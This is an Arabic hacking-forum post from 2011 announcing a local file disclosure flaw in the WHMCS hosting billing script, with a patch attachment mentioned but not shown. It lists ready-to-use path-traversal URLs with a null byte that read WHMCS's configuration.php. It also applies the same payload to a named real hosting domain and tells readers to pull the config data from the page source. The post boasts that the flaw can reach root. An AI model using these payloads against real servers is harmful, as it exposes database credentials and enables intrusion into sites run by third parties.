الموضوع: ثغره بسكربت الاستضافه WHMCompleteSolution Local File Disclosure مع الترقيع
عرض مشاركة واحدة
قديم 10-23-2011, 10:34 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي ثغره بسكربت الاستضافه WHMCompleteSolution Local File Disclosure مع الترقيع

السلام عليكم ورحمه الله وبركاته


الثغره بسيطه ومنتشره من زمان بين الشباب ع الايميل


لكن في حد حب ينشرها لمواقع السكيورتي الله يهديه

(رح تترقع هيك الثغره )

خطوره الثغره كبيره لانك ممكن توصل للروت

الاستغلال

كود PHP:

cart.php?a=test&templatefile=../../../configuration.php%00
submitticket.php?step=test&templatefile=../../../configuration.php%00
downloads.php?action=test&templatefile=../../../configuration.php%00 
بتقرا الكونفج بالسورس كود للصفحه

مثال



كود PHP:

https://storm-servers.net/whmcs/cart.php?a=test&templatefile=../../../configuration.php%00 
افتح اللنك وبعد افتح السورس كود بتلقى بينات الكونفج

اتوقع الشرح مفهوم خاصه مع المثال

وترقيع الثغره بالمرفقات
ارفع المرفق بداخل سكربت whmcs

واستبدله بالملف الاصلي

بامان الله ورعايته

eyvi fs;vfj hghsjqhti WHMCompleteSolution Local File Disclosure

الملفات المرفقة
نوع الملف: rar dbconnect.rar‏ (16.8 كيلوبايت, المشاهدات 25)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

التعديل الأخير تم بواسطة Cyber Code ; 11-09-2011 الساعة 01:41 AM.

   

رد مع اقتباس